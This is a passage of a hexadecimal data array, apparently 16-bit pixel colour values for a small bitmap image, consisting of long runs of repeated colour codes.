0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 